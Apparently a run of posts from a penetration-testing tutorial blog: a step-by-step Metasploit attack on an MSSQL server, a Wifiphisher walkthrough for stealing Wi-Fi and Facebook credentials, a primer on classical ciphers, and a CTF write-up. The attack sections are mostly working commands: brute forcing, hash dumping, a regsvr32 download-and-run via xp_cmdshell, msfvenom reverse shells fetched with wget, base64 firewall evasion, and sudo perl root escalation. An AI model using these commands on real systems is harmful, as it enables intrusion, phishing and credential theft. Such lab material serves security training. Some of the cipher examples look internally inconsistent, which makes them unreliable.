Target: Windows 10 (MS SQL Server)

Let’s start!!

MSSQL Brute force Attack

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login)> set rhosts 192.168.1.104

msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt

msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(mssql_login) > run

This will perform brute force attack matching valid combination for username and password from given dictionary.

In specified image you can observe that we had successfully retrieve credential for two users:

Username: ignite and password: 12345

Username: sa and password: 123

Enumerate MSSQL configuration setting

This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

use auxiliary/admin/mssql/mssql_enum

msf auxiliary(mssql_enum) > set rhosts 192.168.1.104

msf auxiliary(mssql_enum) >set password admin123

msf auxiliary(mssql_enum) >run

Above module had dumped the MSSQL configuration setting where you can observe enabled and disable functions. For example:

Xp-cmdshell is enabled which is a function of Microsoft SQL Server that allows system administrators to execute operating system command. Attacker can inject malicious command of file for making unauthorized access into server.

Identifying SQL Server logins

This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.

use auxiliary/admin/mssql/mssql_enum_sql_logins

msf auxiliary(mssql_enum_sql_logins) >set rhosts 192.168.1.104

msf auxiliary(mssql_enum_sql_logins) > set password admin123

msf auxiliary(mssql_enum_sql_logins) > run

From given below image you can confirm the MSSQL Server login such as “sa” which is also sysadmin and another user “ignite”. Once you have enumerated all logins after that you can make dictionary attack for their passwords.

Identify Database owner

This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the msssql_payload module can be used to obtain a shell on the system.

use auxiliary/admin/mssql/mssql_escalate_dbowner

msf auxiliary(mssql_escalate_dbowner) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_dbowner) > set password admin123

msf auxiliary(mssql_escalate_dbowner) >run

Above module will identify whether specified user do have system administrator role or not. From given below image you can perceive that “sa” is sysadmin user.

Identify a User With masquerade privilege

This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges.

use auxiliary/admin/mssql/mssql_escalate_execute_as

msf auxiliary(mssql_escalate_execute_as) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_execute_as) > set password admin123

msf auxiliary(mssql_escalate_execute_as) > run

From given below image you can perceive that “sa” is sysadmin user.

Execute SQL Statement

This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropriate credentials.

use auxiliary/admin/mssql/mssql_sql

msf auxiliary(mssql_sql) > set rhosts 192.168.1.104

msf auxiliary(mssql_sql) > set password admin123

msf auxiliary(mssql_sql) > run

From given below image you can observe that by default it has run SQL statement to Select version as result it has dumped the complete detail version of SQL server. Here you can execute your own sql statement.

Retrieve MSSQL Password Hashes of Users

This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.

use auxiliary/scanner/mssql/mssql_hashdump

msf auxiliary(mssql_hashdump) > set rhosts 192.168.1.104

msf auxiliary(mssql_hashdump) > set password admin123

msf auxiliary(mssql_hashdump) > run

From given below image you can read the hash value of password set for every database user in MMSQL server.

Decode Password Hashes of Users

This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mssql_fast

msf auxiliary(jtr_mssql_fast) > run

Great!! The tool John the ripper has successfully decoded the hash value set for passwords.

Extracting MYSQL Schema Information

This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.

use auxiliary/scanner/mssql/mssql_schemadump

msf auxiliary(mssql_schemadump) > set rhosts 192.168.1.104

msf auxiliary(mssql_schemadump) > set password admin123

msf auxiliary(mssql_schemadump) > run

Here it has dump the information schema for database “ignite” with table name “student” , 4 columns name with column types:

DB: ignite

Table name: student_details

Ranking

(CT: Numeric ; CL =9)

NAME

(CT: nvarchar; CL =100)

Class

(CT: nchar; CL : =20)

Name

(CT: sysname; CL: = 100)

Execute malicious .dll code through xp-cmdshell as CMD statement

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.115

msf exploit(regsvr32_applocker_bypass_server) > set lport 4455

msf exploit(regsvr32_applocker_bypass_server) > run

Since we known xp_cmdshell function is enabled in SQL server therefore we can easy shoot the target machine by injecting a malicious .dll file through xp_cmdshell function.

After executing above module we will get malicious .dll code as highlighted in the below image, copy this code for injecting into xp_cmdshell as statement.

This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module

use auxiliary/admin/mssql/mssql_exec

msf auxiliary(mssql_exec) > set rhosts 192.168.1.104

msf auxiliary(mssql_exec) > set password admin123

msf auxiliary(mssql_exec) >set CMD “regsvr32 /s /n /u /i:http://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll”

msf auxiliary(mssql_exec) >run

If you will observe above command sets in specified module, you will notice that here we have set above copied malicious .dll code as CMD statement. Hence as soon as we will run this exploit it creates a backdoor in victim’s machine for unauthorized access.

Wonderful!!We have got reverse connection of target machine through meterpreter session.

Exploit xp_cmdshell vulnerability

This module executes an arbitrary payload on a Microsoft SQL Server by using the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wcsript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.

use exploit/windows/mssql/mssql_payload

msf exploit(mssql_payload) >set rhost 192.168.1.104

msf exploit(mssql_payload) >set password admin123

msf exploit(mssql_payload) >set srvhost 192.168.1.115

msf exploit(mssql_payload) >run

Awesome!! Once againwe have got reverse connection of target machine through meterpreter session.

↧

WiFi Exploitation with WifiPhisher

October 31, 2017, 9:58 am

≫ Next: Beginner Guide to Classic Cryptography

≪ Previous: MSSQL Penetration Testing with Metasploit

Hello friends! Today we are going demonstrate WIFI- Phishing attack by using very great tool “WIFIphisher”, please read its description for more details.

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malwares. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Requirement

· Kali Linux.

· Two wifi adapter; one that supports AP mode and another that supports monitor mode.

Wifiphisher Working

After achieving a man-in-the-middle position using the Evil Twin or KARMA attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim's perspective, the attack makes use in three phases:

1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations.

2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed. Furthermore, Wifiphisher listens to probe request frames and spoofs "known" open networks to cause automatic association.

3. Victim is being served a realistic specially-customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malwares. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.

Let’s start!!!

Open the terminal in your Kali Linux and type following command for downloading wifiphisher from git hub.

git clone https://github.com/wifiphisher/wifiphisher.git

Once it get downloaded run python file to install its setup and dependency as shown below:

cd wifiphisher/

python setup.py install

Now run the script by typing wifiphisher on terminal to launch wifi-phishing attack which as similar as social engineering.

Here it will fetch all interfaces as shown in given image and let attacker to choose any one ESSID/BSSID of the target network and try to trap victim by performing phishing. It will also perform both Evil Twin and KARMA attacks.

From list of interface, I had targeted “iball-baton” to trap the victim connect from it.

After than you will get 4 phishing scenarios to trap your target as given below:

1. Firmware Upgrade page

2. Network Manager connect

3. Browser plugin update

4. Oauth login Page

Now let’s go through each phishing scenario one by one starting from 1^st option.

Firmware Upgrade page: A router configuration page without logos or brands asking for WPA/WPA2 password due to a Firmware Upgrade page.

Now when victim will open his browser Firefox he will get a phishing page to upgrade firmware that need WPA/WPA2 password for installing new version of firmware.

The victim may consider it as an official notification and go for upgrading by submitting his WIFI password. As the victim enter the password for WPA/WPA2 and click on start upgrade, he will get trap into fake upgrade process.

Following image is pretending to the victim that firmware is being upgrade don’t close the process until it completed while at background the attacker has captured the WPA/WPA2 password.

Great!!You can confirm the WPA/WPA2 password as shown in given below image, it is showing WPA –password: ram123456ram

Once again repeat the same step to select ESSID.

Now let us go through another phishing scenario from 2^nd option.

Network Manager Connect: Imitates the behavior of the network manager. This templates show’s chrome “connection Failed” page and displays a network manager window through the page asking for pre=shared key. Currently, the network managers of windows and Mac Os are supported.

Now when the victim will open browser he will get a fake page for “connection failed” and more over a fake window for network manager.

Here target will click on “connect” to reconnect with interface.

It asks to enter the password for connection with selected interface while at background the attacker will captured the WPA/WPA2 password.

Great!! Again you can confirm the WPA/WPA2 password as shown in given below image, it has captured WPA –password: ram123456ram

Repeat same step to choose ESSID for attack.

Browser plugin update: A generic browser plugin update page that can be used to serve payloads to the victims.

It will create an exe payload and run multi handler in background for reverse connection of victim system.

Now when again victim will open browser he will get another fake page for Update plugins as shown in given image where it recommended to update the flash player which is outdated.

Now when the victim will click on Update Now, it will start downloading an update.exe file into victim’s system which is nothing but an exe backdoor file for making unauthorized access in his system.

Awesome!!Attacker will get reverse connection of target’s system, from given below image you can see it has open meterpreter session 1.

Repeat same step to choose ESSID for attack.

Now move forward with its last option i.e. 4^thoption.

OAuth Login Page:A free WI-FI service asking for facebook credential to authenticate using OAuth.

At this time when victim will open browser he may get trap into phishing page set as “Get Connect to the Internet For free” as shown in given image.

So when victim will enter his facebook credential for accessing free internet he will get trap in that phishing attack.

Here you can see as victim enters username with password and click on login for facebook connection he got an error message mean while attacker has capture victim’s facebook credential.

Wonderful!!Attacker successfully traps the victim and fetched his facebook account credential.

↧

Beginner Guide to Classic Cryptography

November 3, 2017, 10:11 am

≫ Next: Hack the dina VM (CTF Challenge)

≪ Previous: WiFi Exploitation with WifiPhisher

Cryptography: It is a technique of scrambling message using mathematical logic to keep the information secure. It preserve the scrambled message from being hacked when transport over unsecure network. Since it convert the readable message in unreadable text.

Plaintext: It is the content of data which is in readable form that need to share over insecure network.

Encrypting key: It is random string of bits created particularly to scramble the plaintext information into unreadable text using mathematical logic. There are two types of encryption key symmetric key and asymmetric key.

Cipher text: The output of encryption produce cipher text which in not readable by human beings.

Decrypting key: It is the key which use to decipher the cipher text into again plaintext using symmetric or asymmetric key to read original message

Functionality of cryptosystem

· Authentication:It is the process of verification of the identity of the valid person through his username and password that communicates over a network.

· Authorization:It refers to the process of granting or denying access to a network resource or service. Most of the computer security systems that we have today are based on a two-step mechanism. The first step is authentication, and the second step is authorization or access control, which allows the user to access various resources based on the user’s identity.

· Confidentiality or privacy: It means the assurance that only authorized users can read or use confidential information. When cryptographic keys are used on plaintext to create cipher text, privacy is assigned to the information.

· Integrity: Integrity is the security aspect that confirms that the original contents of information have not been altered or corrupted. There should be not any kind of modification with information while it transport over network.

· Non repudiation: Non repudiation makes sure that each party is liable for its sent message. Someone can communicate and then later either falsely deny the communication entirely or claim that it occurred at a different time, or even deny receiving any piece of information.

Classical Cryptographic Algorithms types

Caesar cipher

Caesar cipher is a type of substitution cipher in which each letter of the alphabet is swap by a letter a certain distance away from that letter.

Algorithm

Step 0: Mathematically, map the letters to numbers (i.e., A = 1, B = 2, and so on).

Step 1: Select an integer key K in between 1 and 25 (i.e., there are total 26 letters in the English language) let say shift right 3 alphabets where A +3 = D, B+3 = E and so on.

Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k)%26.

For example encryption of “IGNITE” will like as:

C = E (L+K) %26

Here L= I and K = 3

C = E (I+3) % 26

C = E (9+3) % 26

C = E (12) % 26

C = E (L)

Hence encryption of IGNITE: LJQLWH

Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L – k) %26.

For example Decryption of “LJQLWH” will like as:

C = D (L-K) %26

C = D (L-3) % 26

C = D (12-3) % 26

C = D (9) % 26

C = D (I)

Hence decryption of LJQLWH: IGNITE

Limitation: Caesar cipher is vulnerable to brute-force attack because it depends on a single key with 25 possible values if the plaintext is written in English. Consequently, by trying each option and checking which one results in a meaningful word, it is possible to find out the key. Once the key is found, the full cipher text can be deciphered accurately.

Monoalphabetic Cipher

It is also a type of substitution cipher in which each letter of the alphabet is swap by using some permutation of the letters in alphabet. Hence permutations of 26 letters will be 26! (Factorial of 26) and that is equal to 4x10²⁶. This technique uses a random key for every single letter for encryption and which makes the monoalphabetic cipher secure against brute-force attack.

The sender and the receiver decide on a randomly selected permutation of the letters of the alphabet. For example in word “HACKING” replace G from “J” and N from “W” hence permutation key is 2! i.e. factorial of 2 and HACKING will become “HACKJIW”.

Algorithm

Step 0: Generate plaintext–cipher text pair by mapping each plaintext letter to a different random cipher text letter IJKLQR--------GFE.

Step 1: To encipher, for each letter in the original text, replace the plaintext letter with a cipher text letter.

Hence encryption of “IGNITE” will be as shown below:

Step 2: For deciphering, reverse the procedure in step 1.

Hence decryption of “USBUOQ” will be “IGNITE”

Limitations

Despite its advantages, the random key for each letter in monoalphabetic substitution has some downsides too. It is very difficult to remember the order of the letters in the key, and therefore, it takes a lot of time and effort to encipher or decipher the text manually. Monoalphabetic substitution is vulnerable to frequency analysis.

Playfair Cipher

It encrypts digraphs or pairs of letters rather than single letters like the plain substitution cipher

In this cipher a table of alphabet is 5x5 grids is created which contain 25 letters instead of 26. One alphabet “J” (or any other) is omitted.One would first fill in the spaces in the table with the letters of the keyword (dropping any duplicate letters), then fill the remaining spaces with the rest of the letters of the alphabet in order. If the plaintext () contains J, then it is replaced by I.

Algorithm

Step 0: Split the plaintext into pair, if number of letters are odd then add “X” with last letter of plaintext

For example “TABLE” is our plaintext split it into pair as: TA BL EX

Step 1: Set the 5 × 5 matrix by filling the first positions with the key. Fill the rest of the matrix with other letters. Let assume “ARTI” is our key for encryption.

Step 2: For encryption it involves three rules:

If both letters fall in the same row, substitute each with the letter to its right in a circular pattern. TA-----> IR

(1) If both letters fall in the different row and column, form a rectangle with the two letters and take the letters on the horizontal opposite corner of the rectangle. BL-----> TN

(1) If both letters fall in the same column, substitute each letter with the letter below it in a circular pattern. EX-----> LT

Hence encryption of word “TABLE” is “IR TN LT”.

Step 3: For decryption receiver use same key to decipher the text by reversing above three rules used in step 2.

Limitations:

Playfair is considerably complicated to break; it is still vulnerable to frequency analysis because in the case of Playfair, frequency analysis will be applied on the 25*25 = 625 possible digraphs rather than the 25 possible monographs (monoalphabetic)

Polyalphabetic Cipher

A polyalphabetic substitution cipher is a series of simple substitution ciphers. It is used to change each character of the plaintext with a variable length. The Vigenere cipher is a special example of the polyalphabetic cipher.

Algorithm

Step 0: Decide a encrypting key to change plaintext into cipher, for example take “HACKING” as encryption key whose numerical representation is “7, 0 ,2 ,10, 8, 13, 6 “

Step 1: To encrypt, the numeric number of first letter of the key encrypts the first letter of the plaintext, the second numeric number of second letter of the key encrypts the second letter of the plaintext, and so on.

For example plaintextis “VISIT TO HACKING ARTICLES” and key is “HACKING: 7 0 2 10 8 13 6”

Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k)%26

C = E (L+K) %26

Here L=V and K =7

C = E (V+7) %26

C = E (21+7) %26

C = E (28) %26

C = E (2)

C = E (C)

Hence encryption of “VISIT TO HACKING ARTICLES” is “CIUSBGUOAEUQAMHRVSKYKZ”

Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L – k) %26.

For example Decryption of “CIUSBGUOAEUQAMHRVSKYKZ” will like as:

C = D (L-K) %26

Here L=C and K =7

C = E (C-7) %26

C = E (21)

C = E (V)

Hence decryption of “CIUSBGUOAEUQAMHRVSKYKZ” is “VISIT TO HACKING ARTICLES”

Limitation

The main limitation of the Vigenère cipher is the repeating character of its key. If a cryptanalyst properly estimate the length of the key, then the cipher text can be treated as link Caesar ciphers, which can be easily brokenseparately.

Rotation cipher

In rotation cipher generates cipher text on the behalf of block size and angle of rotation of plain text in the direction of following angles: 90^o180⁰270^o

Algorithm

Step 0: Decide the size of block for plaintext “CRYPTOGRAPHY”, let assume 6 as block size for it.

CRYPTO

GRAPHY

Step 1: For encryption arrange plaintext in any direction among these angles 90^o180⁰270^oas shown below:

· In 90^o Rotation place starting letter downwards vertically from G to C and so on.

CRYPTO

GRAPHY

· In 180^o Rotation place letter right to left horizontally from O to C and so on.

CRYPTO	OTPYRC
GRAPHY	YHPARG

· In 270^o Rotation place last letter top to bottom vertically from O to Y and so on.

CRYPTO

GRAPHY

Hence cipher text will arrange in following ways:

Step 2: arrange letter according their angles represents:

90^o rotated cipher “GCRRAYPPHTYO”

180^o rotated cipher “YHPARGOTPYRC”

270^o rotated cipher “OYTHPPYARRCG”

Step 3: for decryption using block size and angle of rotation among all above three cipher texts can be decrypt.

Transposition cipher

In transposition cipher plaintext are rearrange without replacing original letter from other as compare to above cipher techniques.

Algorithm

Step 0: Decide the keyword that will be represent the number of column of a table which store plain text inside it, and help in generating cipher text, let suppose we choose CIPHER as key.

Step 1: store plaintext “classical cryptography” in a table from left to right cell.

Step 2: for encryption arrange all letters according to columns from in ascending order of keyword “CIPHER” will be CEHIPR as:

Column 1: CCCPP

Column2: ESRR

Column 3: HSCG

Column 4: PALOY

Column 5: RIYA

Hence the cipher obtain will be “CCCPPESRRHSCGPALOYRIYA”

Step 3: for decryption receiver use key to rearrange 26 cipher letters according to its column in 6*5 matrix.

Limitation

It was very easy to rearrange cipher letter if correct key is guesses.

Rail fence cipher

The 'rail fence cipher' also called a zigzag cipher is a form of transposition cipher the plain text is written downwards and diagonally on successive "rails" of an imaginary fence, then moving up when we reach the bottom rail.

Algorithm

Step 0: choose the number rails which will act as key for plotting the plaintext on it. Here 3 rails is decided as key for encryption

Step 1: plot plaintext“RAJ CHANDEL” on the rail in zigzag form, in direction top to bottom (downwards and diagonally) and then bottom to up (upwards and diagonally)

Step 2: for encryption place all letter horizontally starting form row 1 to row 3 as:

Row 1: RHE

Row 2: ACADL

Row 3: JN

Hence encryption for “RAJCHANDEL” is “RHEACADLJN”

Step 3: for decryption generate the matrix by multiplying total cipher text with number of rail, here

Total 10 letters are in cipher text “RHEACADELJN” and 3 rails, hence matrix will of 10*3.

Transverse the above rule use in encryption and place the cipher text as

Row 1: RHE

Row 2: ACADL

Row 3: JN

Limitations

The rail fence cipher is not very strong; the number of practical keys (the number of rails) is small enough that a cryptanalyst can try them all by hand.

↧

Hack the dina VM (CTF Challenge)

November 5, 2017, 8:59 am

≫ Next: Wifi Post Exploitation on Remote PC

≪ Previous: Beginner Guide to Classic Cryptography

Hello friends! Today we are going to take another CTF challenge known as dina. The credit for making this vm machine goes to “Touhid Shaikh” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.104

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.104/

We find robots.txt, we open robots.txt in our browser and name of the directories of the server.

We open nothing directory and find a 404 page. We take a look at the source code of the webpage and find a few passwords.

Now we open secure/directory that we found using dirb. Inside the directory we find a zip file we download it in our system.

After download it in our system we try to unzip it but it prompts for password. So we try one of the passwords that we found earlier inside the web-page. The password turns out to be ‘freedom’

Now after we extract the file we find a mp3 file. We check the file type and find out it is actually a ascii file. We open it and find a username and a name of directory.

Now we open the directory and find a login page. We use one of the passwords from the web-page.

We use username touhid and find password to be diana.

After logging in we find that the author has created a vulnerable application. The details of how to exploit this vulnerability are given by the author here.

First we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.124

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Now we create our payload using msfvenom

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.124 lport=4444 -f elf > /var/www/html/shell

Now we convert our commands to upload the shell to base64 to bypass the firewall.

echo ‘wget http://192.168.1.124/shell -O /tmp/shell’ |base64

echo ‘chmod 777 /tmp/shell’ |base64

echo ‘/tmp/shell’ |base64

Now to execute the upload our shell we change the name of the file with our php code to execute our shell commands. We use the the following code to replace the name of the file we upload.

base64encodestring’)); die();?>\”.php

Now as soon as we execute our shell we get reverse connection. Now we take a look at the sudoers list and we find that we have access to perl. So we spawn our shell using perl.

sudo -l

sudo perl -e “exec ‘/bin/sh’”

Now we go to root folder and we find the final flag. When we open the flag we find a message congratulating us on the completion of the challenge.

↧